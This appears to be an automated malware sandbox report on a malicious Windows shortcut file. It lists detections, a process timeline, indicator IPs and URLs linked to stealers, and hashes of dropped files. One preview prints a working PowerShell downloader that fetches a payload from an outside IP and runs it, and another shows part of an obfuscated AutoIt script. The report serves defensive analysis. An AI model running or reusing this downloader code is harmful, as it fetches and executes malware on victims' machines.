                                                                                                                                                                        Original Sample Name:c994e4260593f7a34502021234dae6a9.lnk
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.expl.evad.winLNK@75/255@13/10
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                                                        • Number of executed functions: 94
                                                                                                                                                                        • Number of non-executed functions: 276
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .lnk
                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 23.218.208.109, 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.17.78, 13.107.6.158, 23.200.87.141, 23.210.249.83, 142.250.176.195, 142.250.80.99, 142.251.40.195, 40.126.53.7, 20.103.156.88, 13.107.246.63, 104.116.245.83, 94.245.104.56, 20.12.23.50, 13.107.246.40, 23.44.136.133, 150.171.27.10, 2.19.193.114
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, client.wns.windows.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, otelrules.azureedge.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.mic
                                                                                                                                                                        • Execution Graph export aborted for target mshta.exe, PID 1476 because there are no executed function
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 612 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 9152 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: R4qP4YM0QX.lnk
Time | Type | Description
15:06:01 | API Interceptor | 2x Sleep call for process: svchost.exe modified
15:06:02 | API Interceptor | 1x Sleep call for process: mshta.exe modified
15:06:03 | API Interceptor | 119x Sleep call for process: powershell.exe modified
15:07:03 | API Interceptor | 1854x Sleep call for process: Guard.exe modified
15:07:23 | API Interceptor | 613x Sleep call for process: SwiftWrite.pif modified
21:06:31 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.159.61.3 | g8ix97hz.vbs | malicious | GuLoader, RHADAMANTHYS |
162.159.61.3 | H3G7Xu6gih.exe | malicious | RHADAMANTHYS |
162.159.61.3 | HI6VIJERUn.exe | malicious | RHADAMANTHYS |
162.159.61.3 | ko.ps1.2.ps1 | malicious | Unknown |
162.159.61.3 | urS3jQ9qb5.jar | malicious | Can Stealer |
162.159.61.3 | EXTERNALRe.msg | malicious | Unknown |
162.159.61.3 | YF3YnL4ksc.exe | malicious | Unknown |
162.159.61.3 | https://garfieldthecat.tech/Receipt.html | malicious | WinSearchAbuse |
162.159.61.3 | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer |
162.159.61.3 | 122046760.bat | malicious | RHADAMANTHYS |
139.99.188.124 | R8CAg00Db8.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | s4PymYGgSh.lnk | malicious | Unknown | 139.99.188.124/EsgMle.txt
139.99.188.124 | EO3RT0fEfb.exe | malicious | Unknown | 139.99.188.124/ucZfzm.txt
139.99.188.124 | RMBOriPHVJ.exe | malicious | Unknown | 139.99.188.124/mzmLv.txt
139.99.188.124 | S6x3K8vzCA.exe | malicious | Unknown | 139.99.188.124/wPBPjuY.txt
139.99.188.124 | PPbimZI4LV.exe | malicious | Unknown | 139.99.188.124/BlQMSgJx.txt
139.99.188.124 | l5VhEpwzJy.exe | malicious | Unknown | 139.99.188.124/jiJNz.txt
139.99.188.124 | duyba.lnk.download.lnk | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | pt8GJiNZDT.exe | malicious | Unknown | 139.99.188.124/QWCheljD.txt
139.99.188.124 | FwR7as4xUq.exe | malicious | Unknown | 139.99.188.124/EPDjSfs.txt
104.116.245.121 | https://u1.padletusercontent.com/uploads/padlet-uploads/3025704792/6a713d777f6a37c342ac9ff24818d63a/AContactinyourAddressBook.pdf?token=M4XZQk0-e0NegbPKN1EJFleeEg1SvAJHdhT-Qqn0IkrT5Su7By9B8urGCx2aLfmJMlgU5pPj_rq7vwJTjl3Mo83xjhy_G7fpTmckKxF_1H_Z492RSJiRSa3MofZP5-14SdBnispcHFsREDhhEifxgSR79jzwl3Q_R367A9ozgQRT4PbUB36zYP2FqxL7ZQfSwKjHH3FrzM2GPeTcuOwd8LrJMHGk1iqhNWgBjuGUF8BCo6b-0YxOTsq00c-_jwQFgXebvlVvdLX7cLMfAYfxPg== | malicious | Unknown |
                                                                                                                                                                                              147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                                                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tiffany-careers.com/BFmcYQ.exe
                                                                                                                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                                                                                                                              • 167.114.27.228
                                                                                                                                                                                              http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 54.38.113.2
                                                                                                                                                                                              yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 91.134.10.127
                                                                                                                                                                                              yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 91.134.10.182
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              6271f898ce5be7dd52b0fc260d0662b3https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 150.171.28.10
                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eList of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onionGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 20.198.119.143
                                                                                                                                                                                              • 20.198.118.190
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 147.45.49.155
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Guard.exe | R8CAg00Db8.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | s4PymYGgSh.lnk | malicious | Unknown
C:\Users\Public\Guard.exe | PkContent.exe | malicious | Unknown
C:\Users\Public\Guard.exe | PkContent.exe | malicious | Unknown
C:\Users\Public\Guard.exe | ldqj18tn.exe | malicious | Unknown
C:\Users\Public\Guard.exe | ldqj18tn.exe | malicious | Unknown
C:\Users\Public\Guard.exe | EO3RT0fEfb.exe | malicious | Unknown
C:\Users\Public\Guard.exe | RMBOriPHVJ.exe | malicious | Unknown
C:\Users\Public\Guard.exe | S6x3K8vzCA.exe | malicious | Unknown
C:\Users\Public\Guard.exe | PPbimZI4LV.exe | malicious | Unknown
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                  Entropy (8bit):0.7485908552538467
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0z:9JZj5MiKNnNhoxuM
                                                                                                                                                                                                                  MD5:D17146E7AAC9CAC15F874EFB8D88952B
                                                                                                                                                                                                                  SHA1:2770253495ACBB8E2B2EA69CFC6529BD7BB65705
                                                                                                                                                                                                                  SHA-256:DED6F0DC273CDD3964A1891D3E6D0E48FEC41033C43869F3B364A2D41E859193
                                                                                                                                                                                                                  SHA-512:A4F0F24762F52A0C5EB2FBA251007FAC2571F31FC34523CED841CF5EFB6E47D22DAC44902E5DEC0A3574EE00232675C22CCC143CB53699D2698BE50C551D10D1
                                                                                                                                                                                                                  Malicious:false
Preview: (binary data; readable strings: C:\ProgramData\Microsoft\Network\Downloader\, C:\ProgramData\Microsoft\Network\Downloader\qmgr.db)
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0xbd387b74, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                  Entropy (8bit):0.7556194145719025
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:X/9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kA:X/9azaSvGJzYj2UlmOlOL
                                                                                                                                                                                                                  MD5:82CE731F33A33B000790CBC9209604C6
                                                                                                                                                                                                                  SHA1:F6BB41C765BFE1C94F473A2327E42B379A116B89
                                                                                                                                                                                                                  SHA-256:E2E428FA7DC0A9B2C1968BCDC17D7EED44CB84A76F12E8BC7FD4DBA1542D01FD
                                                                                                                                                                                                                  SHA-512:1B7D75B12D8BADE97C5BCC85817050710EFBE182E824D71C4D2858D3E2EF9D2C6306B4DDFD66CF602ECBFD3499F9304DAA412BF6C62BBF1E9E6B09945E4F264A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                  Entropy (8bit):0.07954828079813892
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:erwdYeTG3NaAPaU1lelpuAlluxmO+l/SNxOf:erwdzTiNDPaUGzuAgmOH
                                                                                                                                                                                                                  MD5:02A018B60233C6C3EF25489220D09F34
                                                                                                                                                                                                                  SHA1:4499277F8C07DB715CAF4A3BB497298F3717CEF1
                                                                                                                                                                                                                  SHA-256:DBB3C1CCA7441964A71B6292A7B8220D3A40BF9809783EBAF57E4E46F919E828
                                                                                                                                                                                                                  SHA-512:83081ECB2F5E5BF0DFEB3BA719FFA2FE901ED11DB2D0F1901DCF84BEFE879AA2457BA1152D0A80011875E30CBE10E8116467AE8E697D88BEF57411BB88253899
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):893608
                                                                                                                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: R8CAg00Db8.lnk, Detection: malicious
• Filename: s4PymYGgSh.lnk, Detection: malicious
• Filename: PkContent.exe, Detection: malicious
• Filename: PkContent.exe, Detection: malicious
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: ldqj18tn.exe, Detection: malicious
• Filename: EO3RT0fEfb.exe, Detection: malicious
• Filename: RMBOriPHVJ.exe, Detection: malicious
• Filename: S6x3K8vzCA.exe, Detection: malicious
• Filename: PPbimZI4LV.exe, Detection: malicious
                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):486
                                                                                                                                                                                                                  Entropy (8bit):5.264402695461477
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:f73/oomFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/UCknZ9LzjYnRSb8Cba
                                                                                                                                                                                                                  MD5:AA25D3FDAD1F106B38D0FC6EF7812219
                                                                                                                                                                                                                  SHA1:1811C03BBAD3B7ED95835D4CC6D43C664C1B4A5B
                                                                                                                                                                                                                  SHA-256:6CC303DD32C6F3629ACD59CFB6219D30D504AC12BBA0AFD87F38012E211496E0
                                                                                                                                                                                                                  SHA-512:ED1809238957DAF71ADB4F3D0996D9CD51431AC0FB04180F4FEB5A4FE51CF07F95F935D8F56863B019AFAB737E03BE5E2E687FEB8C0416F4E470E40A282EC566
                                                                                                                                                                                                                  Malicious:true
Preview:
[string]$fU5L = "http://139.99.188.124/QWCheljD.txt"
[string]$oF6L = "C:\Users\Public\Secure.au3"
[string]$exePath = "C:\Users\Public\Guard.exe"

# Download the content from the URL
$wResp = New-Object System.Net.WebClient
$fCont = $wResp.DownloadString($fU5L)

# Save the downloaded content to the output file
Set-Content -Path $oF6L -Value $fCont -Encoding UTF8

# Run the executable with the output file as an argument
Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1240103
                                                                                                                                                                                                                  Entropy (8bit):5.144317310151777
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:28V+jcfSgyuH7Kixj+UXk8pL6OvsEmeXBWD4LkPq0e718m3UDd:qcB7HxicaEmEQD3I1jUZ
                                                                                                                                                                                                                  MD5:5FD6DCD6015C6F3F00D18BE2CE75691F
                                                                                                                                                                                                                  SHA1:63007CCA9ED6C2A903AA30B6FA00EB280D4879A2
                                                                                                                                                                                                                  SHA-256:044C72C01C72338F3559D098BEBF9D251F911B9FF41DD958EB80D8F7C9583C31
                                                                                                                                                                                                                  SHA-512:29DFDE6DBE2BDA1F6FBC7FACD06B9F66BED01BC5C01ECEFC6C35DE0A49D905869ADFFBC89B9934650CC6D28C3F0377FC6BE4CE25F92D54646A909DFAD7282219
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44974
                                                                                                                                                                                                                  Entropy (8bit):6.09570556794521
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xW2ki1zNtec/9xiYCOgQLKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOz/fKtSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:98BAC0DF69FDC160F46DCAADE283F8D6
                                                                                                                                                                                                                  SHA1:549AD684E78FEE21E2BB31A7FE7CBBAEB088F5EA
                                                                                                                                                                                                                  SHA-256:4B0686DE47FC26F99399163D640B1269CC09552949E97BE461041B0E31EF312D
                                                                                                                                                                                                                  SHA-512:04F8541E5ADCE4CDECB089F567F9DAEBD165FE5648473F58F46B5E38510C3E591D6BCB2DA050A8B411CCB1379A5E02DF47CAB263BDB596A295483AA4AA8623A0
                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                                                  Entropy (8bit):6.095693446140294
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWDki1zNtec/NEiBPbsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn6/EKtSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:D9A783347854BBBC83FB17CCD0CE058F
                                                                                                                                                                                                                  SHA1:2B5962FA6D58442F331DCACFC974AAB9DDEDBE83
                                                                                                                                                                                                                  SHA-256:E422EC76BD2AE2869D9C56D807102B87AFA8D9E205DDCB92DBCFD673EE204009
                                                                                                                                                                                                                  SHA-512:CC845D0A8B54F4566C4578CF35EE060062DBCCFEA11C06BEA8B83F9D866D5305315A7F445A93CA49411052576EF1F8D4F1D7CA3657C893F99B9A2C273343267E
                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):46144
                                                                                                                                                                                                                  Entropy (8bit):6.08749079418706
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:LMkbJrT8IeQc5dKWJfi1zNtec/9xiYCOgQLXxYPCionJDSgzMMd6qD47u30d:LMk1rT8H1K5/fXxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:DFDB99FBCA48AF8A56FE6FC37A2B3E44
                                                                                                                                                                                                                  SHA1:1E7AF358D01CA09AAAEBA4790289101D1ED82BC3
                                                                                                                                                                                                                  SHA-256:83EDB8D5E2A36B2A0CDC1D39667E35F1F8ACB4E6D7A066B733812823CFB14F4C
                                                                                                                                                                                                                  SHA-512:A9EEDF78358E4291790ADE5FBB8C3129D34962C16C22FC0C5DFE1D1165264CC16654D9882B079E87F1299C4BEF959710CA911AC45E7892DEB3164AD23B27104B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
